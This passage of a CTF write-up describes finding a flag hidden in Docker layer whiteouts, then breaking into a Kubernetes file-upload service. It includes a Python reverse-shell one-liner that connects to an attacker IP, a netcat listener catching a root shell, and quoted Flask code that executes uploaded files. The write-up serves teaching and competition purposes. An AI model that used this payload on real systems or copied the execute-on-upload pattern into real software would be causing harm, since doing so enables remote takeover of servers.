╰─$ ls
1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984 760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19 d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5
42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b 88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306 e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d
5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92 8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924 e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd
59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc 8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00 e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675
5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8 92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317 eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e
601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056 99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7 f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17
65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5
6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01 d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3
$ file *
1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984: POSIX tar archive
42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b: JSON text data
5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92: POSIX tar archive
59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc: JSON text data
5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8: POSIX tar archive
601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056: POSIX tar archive
65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f: JSON text data
6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01: JSON text data
760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19: JSON text data
88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306: JSON text data
8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924: POSIX tar archive
8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00: JSON text data
92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317: POSIX tar archive
99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7: JSON text data
c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5: JSON text data
d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3: POSIX tar archive
d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5: JSON text data
e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d: JSON text data
e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd: POSIX tar archive
e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675: JSON text data
eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e: POSIX tar archive
f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17: POSIX tar archive
$ file * | grep tar | cut -d : -f 1 | xargs -I {} mv {}{,.tar}
$ ls
1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984.tar 760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19 d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5
42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b 88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306 e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d
5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92.tar 8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924.tar e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd.tar
59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc 8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00 e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675
5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8.tar 92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317.tar eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e.tar
601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056.tar 99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7 f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17.tar
65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5
6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01 d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3.tar
$ ls *.tar | xargs -n 1 atool -x
.dockerenv
bin
dev/
dev/console
[..SNIP..]
Now, that’s all the tar balls extract. Let’s start finding things. We can start with the fake flags, because why not.
The first fake flag was saved as .wh.flag.txt
$ find . -name .wh.flag.txt -exec cat {} \; | base64 -d
CTF{sorry_this_isnt_it}
Second was in flag.txt
.
$ find . -name flag.txt -exec cat {} \; | base64 -d
CTF{sorry_you_didnt_find_me_but_your_closer}
The final one was .wh.hidden.txt
$ find . -name .wh.hidden.txt -exec cat {} \; | base64 -d
CTF{sorry_Just_another_ghost_dontgiveup}
Now thinking about where the actual flag could be. In the Dockerfile, there was one other set of things that were deleted. The folders (rm -rf /tmp/*, /cache/*, /var/cache/apk/*, var/lib/db/sbom/*
). The real flag is probably in there somewhere.
Let’s use find
again to see what files could match those.
$ find . -type f | grep tmp
$ find . -type f | grep cache
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/etc/ld.so.cache
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/etc/ld.so.cache
$ find . -type f | grep sbom
./var/lib/db/sbom/.wh.zsh-5.9r7.spdx.json
./var/lib/db/sbom/.wh.zlib-1.3.1-r50.spdx.json
./var/lib/db/sbom/.wh.wolfi-keys-1-r11.spdx.json
./var/lib/db/sbom/.wh.wolfi-baselayout-20230201-r21.spdx.json
./var/lib/db/sbom/.wh.wolfi-base-1-r7.spdx.json
./var/lib/db/sbom/.wh.libxcrypt-4.4.38-r2.spdx.json
./var/lib/db/sbom/.wh.libssl3-3.5.1-r0.spdx.json
./var/lib/db/sbom/.wh.libgcc-15.1.0-r1.spdx.json
./var/lib/db/sbom/.wh.libcrypto3-3.5.1-r0.spdx.json
./var/lib/db/sbom/.wh.libcrypt1-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.ld-linux-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.glibc-locale-posix-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.glibc-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.ca-certificates-bundle-20241121-r42.spdx.json
./var/lib/db/sbom/.wh.busybox-1.37.0-r46.spdx.json
./var/lib/db/sbom/.wh.apk-tools-2.14.10-r5.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/zsh-5.9r7.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/zlib-1.3.1-r50.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/wolfi-keys-1-r11.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/wolfi-baselayout-20230201-r21.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/wolfi-base-1-r7.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libxcrypt-4.4.38-r2.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libssl3-3.5.1-r0.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libgcc-15.1.0-r1.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libcrypto3-3.5.1-r0.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libcrypt1-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/ld-linux-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/glibc-locale-posix-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/glibc-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/ca-certificates-bundle-20241121-r42.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/busybox-1.37.0-r46.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/apk-tools-2.14.10-r5.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/zsh-5.9r7.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/zlib-1.3.1-r50.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/wolfi-keys-1-r11.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/wolfi-baselayout-20230201-r21.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/wolfi-base-1-r7.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libxcrypt-4.4.38-r2.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libssl3-3.5.1-r0.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libgcc-15.1.0-r1.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libcrypto3-3.5.1-r0.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libcrypt1-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/ld-linux-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/glibc-locale-posix-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/glibc-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/ca-certificates-bundle-20241121-r42.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/busybox-1.37.0-r46.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/apk-tools-2.14.10-r5.spdx.json
Let’s start with the SBOMs, probably easier to hide a flag within some JSON files compared to ld.so.cache
.
$ ls -lp
total 64
-rw-r--r-- 1 user user 3593 Jul 2 14:52 apk-tools-2.14.10-r5.spdx.json
-rw-r--r-- 1 user user 3132 Jun 17 14:28 busybox-1.37.0-r46.spdx.json
-rw-r--r-- 1 user user 3397 May 28 14:35 ca-certificates-bundle-20241121-r42.spdx.json
-rw-r--r-- 1 user user 3455 Jul 2 17:06 glibc-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3546 Jul 2 17:06 glibc-locale-posix-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3476 Jul 2 17:06 ld-linux-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3483 Jul 2 17:06 libcrypt1-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3390 Jul 2 17:17 libcrypto3-3.5.1-r0.spdx.json
-rw-r--r-- 1 user user 3308 Jun 2 18:31 libgcc-15.1.0-r1.spdx.json
-rw-r--r-- 1 user user 3369 Jul 2 17:17 libssl3-3.5.1-r0.spdx.json
-rw-r--r-- 1 user user 3091 May 28 14:35 libxcrypt-4.4.38-r2.spdx.json
-rw-r--r-- 1 user user 2037 Feb 11 20:06 wolfi-base-1-r7.spdx.json
-rw-r--r-- 1 user user 2153 Jun 23 14:08 wolfi-baselayout-20230201-r21.spdx.json
-rw-r--r-- 1 user user 2050 May 28 14:35 wolfi-keys-1-r11.spdx.json
-rw-r--r-- 1 user user 2958 Jun 23 14:34 zlib-1.3.1-r50.spdx.json
-rw-r--r-- 1 user user 83 Jul 5 21:36 zsh-5.9r7.spdx.json
The first thing I notice is the zsh-5.9r7.spdx.json
file is considerably different in file size compared to the rest.
$ cat zsh-5.9r7.spdx.json
{"SHA256": "U3poVFExUkdlM2RvYVhSbGIzVjBjeTFqWVc1MExYTjBiM0F0YldVdFltRmllWDBLCg=="}
$ base64 -d <<< U3poVFExUkdlM2RvYVhSbGIzVjBjeTFqWVc1MExYTjBiM0F0YldVdFltRmllWDBLCg== | base64 -d
K8SCTF{whiteouts-cant-stop-me-baby}
This one did take a while to get accepted in CTFd, but eventually we got there after a ping to the organisers :D
Challenge 5 - terminate-transfer by Adam Crompton (@3nc0d3r)
Needed a fileshare to share c@r$ with friends. If your a real friend you will know how to enter my c@r$....
Start by exec-ing into the entry-pod pod in the terminate-transfer namespace. Connect to the entry service in the sidecar namespace.
Attached you find a python script that runs inside the cluster.
cyl0ck
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, let’s start of once again in entry-pod
.
$ k get pods
NAME READY STATUS RESTARTS AGE
entry-pod 1/1 Running 0 53s
$ k exec -it entry-pod -- bash
root@entry-pod:/#
We also know where to go next.
root@entry-pod:/tmp# curl -v entry.sidecar
* Could not resolve host: entry.sidecar
* Closing connection 0
curl: (6) Could not resolve host: entry.sidecar
Huh… interesting.
OK, let’s enumerate and try to find it. I assume there is a service somewhere. Using coredns-enum we can start quickly enumerating the cluster via DNS.
root@entry-pod:/tmp# ./coredns-enum
12:46AM INF Detected nameserver as 10.128.0.10:53
12:46AM INF Falling back to bruteforce mode
12:46AM INF Guessed [10.128.0.0/22 172.18.0.0/22 172.18.0.0/22] CIDRs from APIserver cert
12:46AM INF Scanning range 10.128.0.0 to 10.128.3.255, 1024 hosts
12:46AM INF Scanning range 172.18.0.0 to 172.18.3.255, 1024 hosts
12:46AM INF Scanning range 172.18.0.0 to 172.18.3.255, 1024 hosts
+-------------+------------------------------------+-------------+--------------------+-----------+
| NAMESPACE | NAME | SVC IP | SVC PORT | ENDPOINTS |
+-------------+------------------------------------+-------------+--------------------+-----------+
| default | kubernetes | 172.18.0.14 | 443/tcp (https) | |
| | | 10.128.0.1 | 443/tcp (https) | |
| | | 172.18.0.14 | 443/tcp (https) | |
| kind | clusterapi-on-demand-control-plane | 172.18.0.6 | ?? | |
| | | | ?? | |
| | ctfd-13-5kczc-sgxdw | 172.18.0.23 | ?? | |
| | | | ?? | |
| | ctfd-13-lb | 172.18.0.22 | ?? | |
| | | | ?? | |
| | ctfd-13-md-0-4r28s-294h9-d6mdj | 172.18.0.24 | ?? | |
| | | | ?? | |
| | ctfd-14-lb | 172.18.0.19 | ?? | |
| | | | ?? | |
| | ctfd-14-ln4c6-ntdjs | 172.18.0.20 | ?? | |
| | | | ?? | |
| | ctfd-14-md-0-74wbv-qp4f8-2w6sd | 172.18.0.21 | ?? | |
| | | | ?? | |
| | ctfd-17-2fjk8-n8v75 | 172.18.0.8 | ?? | |
| | | | ?? | |
| | ctfd-17-lb | 172.18.0.7 | ?? | |
| | | | ?? | |
| | ctfd-17-md-0-ndlj5-gclxn-5d96m | 172.18.0.27 | ?? | |
| | | | ?? | |
| | ctfd-20-62wrp-nbglg | 172.18.0.17 | ?? | |
| | | | ?? | |
| | ctfd-20-lb | 172.18.0.16 | ?? | |
| | | | ?? | |
| | ctfd-20-md-0-cw77r-9nmzz-pcb4c | 172.18.0.18 | ?? | |
| | | | ?? | |
| | ctfd-21-lb | 172.18.0.9 | ?? | |
| | | | ?? | |
| | ctfd-21-md-0-c6tc8-8k5mh-llh2p | 172.18.0.26 | ?? | |
| | | | ?? | |
| | ctfd-21-vjnwg-bj8lx | 172.18.0.25 | ?? | |
| | | | ?? | |
| | ctfd-23-hlcx4-h58kw | 172.18.0.29 | ?? | |
| | | | ?? | |
| | ctfd-23-lb | 172.18.0.28 | ?? | |
| | | | ?? | |
| | ctfd-23-md-0-7jns2-crmfn-d4b8d | 172.18.0.30 | ?? | |
| | | | ?? | |
| | ctfd-34-lb | 172.18.0.10 | ?? | |
| | | | ?? | |
| | ctfd-34-md-0-nnc2d-w8gd9-hxvr9 | 172.18.0.12 | ?? | |
| | | | ?? | |
| | ctfd-34-trlld-tzt2d | 172.18.0.11 | ?? | |
| | | | ?? | |
| | ctfd-35-lb | 172.18.0.13 | ?? | |
| | | | ?? | |
| | ctfd-35-md-0-7qn5b-qcpd7-4njd6 | 172.18.0.15 | ?? | |
| | | | ?? | |
| | kond-registry-docker-1 | 172.18.0.3 | ?? | |
| | | | ?? | |
| | kond-registry-gcr-1 | 172.18.0.4 | ?? | |
| | | | ?? | |
| | kond-registry-k8s-1 | 172.18.0.5 | ?? | |
| | | | ?? | |
| | kond-registry-quay-1 | 172.18.0.2 | ?? | |
| | | | ?? | |
| kube-system | kube-dns | 10.128.0.10 | 53/udp (dns) | |
| | | | 53/tcp (dns-tcp) | |
| | | | 9153/tcp (metrics) | |
+-------------+------------------------------------+-------------+--------------------+-----------+
Hmm… nada.
Further information led me eventually to enumerate a fixed CIDR range based of the pod’s IP.
root@entry-pod:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
3: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 4e:36:7d:5f:39:d6 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.134.65/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::4c36:7dff:fe5f:39d6/64 scope link
valid_lft forever preferred_lft forever
root@entry-pod:/tmp# ./coredns-enum --cidr 192.168.134.65/24
12:48AM INF Detected nameserver as 10.128.0.10:53
12:48AM INF Falling back to bruteforce mode
12:48AM INF Scanning range 192.168.134.0 to 192.168.134.255, 256 hosts
+-----------+-------+----------------+----------+-----------+
| NAMESPACE | NAME | SVC IP | SVC PORT | ENDPOINTS |
+-----------+-------+----------------+----------+-----------+
| sidecars | entry | 192.168.134.66 | ?? | |
+-----------+-------+----------------+----------+-----------+
There it is. sidecars
is plural. I see. We don’t have an open port yet, so let’s scan it.
root@entry-pod:/tmp# nmap -p- -T5 entry.sidecars -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2025-08-10 00:50 UTC
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.35% done; ETC: 01:47 (0:56:00 remaining)
root@entry-pod:/tmp# nmap --top-ports 1000 -T5 entry.sidecars -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2025-08-10 00:51 UTC
Nmap scan report for entry.sidecars (10.135.154.248)
Host is up (0.00010s latency).
rDNS record for 10.135.154.248: entry.sidecars.svc.cluster.local
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE
8087/tcp open simplifymedia
Nmap done: 1 IP address (1 host up) scanned in 25.56 seconds
Nice, now curl.
root@entry-pod:/tmp# curl entry.sidecars:8087
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>cylc0k Upload File!!!</title>
<link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
background-color: #000000;
color: #FF1D8E;
}
.container {
max-width: 800px;
margin: 40px auto;
padding: 30px;
background-color: #000000;
border-radius: 12px;
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
opacity: .8;
}
.btn {
@apply px-5 py-2 rounded-lg font-semibold transition duration-200;
}
.btn-primary {
@apply bg-blue-600 text-black hover:bg-blue-700;
}
.btn-secondary {
@apply bg-pink-200 text-pink-800 hover:bg-pink-300;
}
.btn-danger {
@apply bg-red-500 text-black hover:bg-red-600;
}
.file-item {
@apply flex justify-between items-center bg-pink-50 p-3 rounded-lg mb-2;
}
</style>
</head>
<body style="background-image: url('static/images/IMG_4239.jpeg"'); background-repeat: no-repeat; background-size: cover; background-attachment: scroll;">
<div class="container"><pre>
<center>
.__ _______ __
____ ___.__.| | \ _ \ ____ | | __
_/ ___< | || | / /_\ \_/ ___\| |/ /
\ \___\___ || |_\ \_/ \ \___| <
\___ > ____||____/\_____ /\___ >__|_ \
\/\/ \/ \/ \/
[Upload File]</center></pre>
<div class="bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700 p-4 rounded-lg mb-8" role="alert">
<p class="font-bold">Upload File</p>
<p>Upload specific types of files :)</p>
</div>
<h2 class="text-2xl font-semibold mb-4 text-pink-700">Upload a File</h2>
<form method="POST" action="/upload" enctype="multipart/form-data" class="mb-8 p-6 border border-pink-700 rounded-lg bg-black-700">
<div class="mb-4">
<label for="file" class="block text-pink-700 text-sm font-bold mb-2">Choose File:</label>
<input type="file" name="file" id="file" class="block w-full text-sm text-pink-900 bg-black-700 rounded-lg border border-pink-800 cursor-pointer focus:outline-none focus:border-blue-500 p-2.5">
</div>
<button type="submit" class="btn btn-primary w-full">Upload File</button>
</form>
<h2 class="text-2xl font-semibold mb-4 text-pink-700">Uploaded Files</h2>
<p class="text-pink-600 text-center py-4 border border-dashed border-pink-300 rounded-lg">No files uploaded yet.</p>
</div>
</body>
</html>
Interesting, this looks to have upload functionality.
At this stage, the upload.py
in the description hadn’t yet been shared with us. So I spent quite a while experimenting with the application trying to find a way in. With no luck. Eventually, the organisers uploaded the python code, which included the following snippet:
@app.route('/execute/<filename>')
def execute_file(filename):
"""
Executes specific types of uploaded files and returns their output.
"""
file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
execution_output = ""
# Ensure the file exists before attempting to execute
if not os.path.exists(file_path):
return f"Error: File '{filename}' not found."
# Determine execution method based on file extension
if filename.endswith('.cyl0ck'):
try:
# Execute Python script
result = subprocess.run(['python3', file_path], capture_output=True, text=True, check=True)
execution_output = f"<h3>Output of {filename}:</h3><pre>{result.stdout}</pre>"
if result.stderr:
execution_output += f"<h3>Errors (if any):</h3><pre style='color: red;'>{result.stderr}</pre>"
except subprocess.CalledProcessError as e:
execution_output = f"<h3>Error executing Python script {filename}:</h3><pre style='color: red;'>{e.stderr}</pre>"
except Exception as e:
execution_output = f"<h3>Unexpected error:</h3><pre style='color: red;'>{e}</pre>"
elif filename.endswith('.sh'):
try:
# Execute Shell script
# Make the script executable first
os.chmod(file_path, 0o755) # Add execute permissions
result = subprocess.run([file_path], capture_output=True, text=True, check=True)
execution_output = f"<h3>Output of {filename}:</h3><pre>{result.stdout}</pre>"
if result.stderr:
execution_output += f"<h3>Errors (if any):</h3><pre style='color: red;'>{result.stderr}</pre>"
except subprocess.CalledProcessError as e:
execution_output = f"<h3>Error executing Shell script {filename}:</h3><pre style='color: red;'>{e.stderr}</pre>"
except Exception as e:
execution_output = f"<h3>Unexpected error:</h3><pre style='color: red;'>{e}</pre>"
else:
execution_output = f"<h3>Execution not supported for file type: {filename}</h3>"
execution_output += f"<p>You can <a href='{url_for('uploaded_file', filename=filename)}'>view the file</a> instead.</p>"
# Render a simple page to display the output
return render_template('execution_output.html', filename=filename, output=execution_output)
Ooh, it can execute files uploaded. Once of the files I had uploaded was a sh
script, so let’s try executing that.
root@entry-pod:/tmp# curl entry.sidecars:8087/execute/test.sh
<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
OK… let’s try the cyl0ck
files.
root@entry-pod:/tmp# cat test.cyl0ck
print(1)
root@entry-pod:/tmp# curl entry.sidecars:8087/upload -F "file=@test.cyl0ck"
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/">/</a>. If not, click the link.
root@entry-pod:/tmp# curl entry.sidecars:8087/execute/test.cyl0ck
<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
Hmm….
Trying it again with a import time; time.sleep(10)
did have a noticeable delay in response. Suggesting the code was actually executing, I just couldn’t see the output.
Time for a reverse shell.
root@entry-pod:/tmp# cat test.cyl0ck
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
$ nc -nlvp 8080
Listening on 0.0.0.0 8080
Connection received on 5.78.133.51 34470
/ # ^[[40;5Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Success.
Now time for further enumeration. Looking at the mounts, one entry drew my attention.
/ # ^[[48;5Rmount
mount
/ # ^[[50;5Rcat /proc/self/mounts
cat /proc/self/mounts
[..SNIP..]
/dev/sda1 /var/.hidden ext4 rw,relatime 0 0
[..SNIP..]
I wonder what’s in here ;)
/ # ^[[56;5Rls -alp /var/.hidden
ls -alp /var/.hidden
total 8
drwxrwxrwx 2 root root 4096 Aug 10 00:44 ./
drwxr-xr-x 1 root root 4096 Aug 10 00:44 ../
prw-r--r-- 1 root root 0 Aug 10 00:44 whats-weird-about-this-file.tar
Oh huh. That’s new. That’s a named pipe. I wonder what that is doing.
Let’s try listening to it, to see if anything is submitting anything.
/var/.hidden # ^[[20;16Rtail -f whats-weird-about-this-file.tar
tail -f whats-weird-about-this-file.tar
After a while of listening, nada.
Let’s try submitting some entries as well then.
(sender)
/var/.hidden # ^[[56;16Recho hi > whats-weird-about-this-file.tar
echo hi > whats-weird-about-this-file.tar
/var/.hidden # ^[[56;16Recho foo > whats-weird-about-this-file.tar
echo foo > whats-weird-about-this-file.tar
(tail -f)
hi
/bin/sh: foo: not found
Wait what. Is this executing commands that I submit.
(sender)
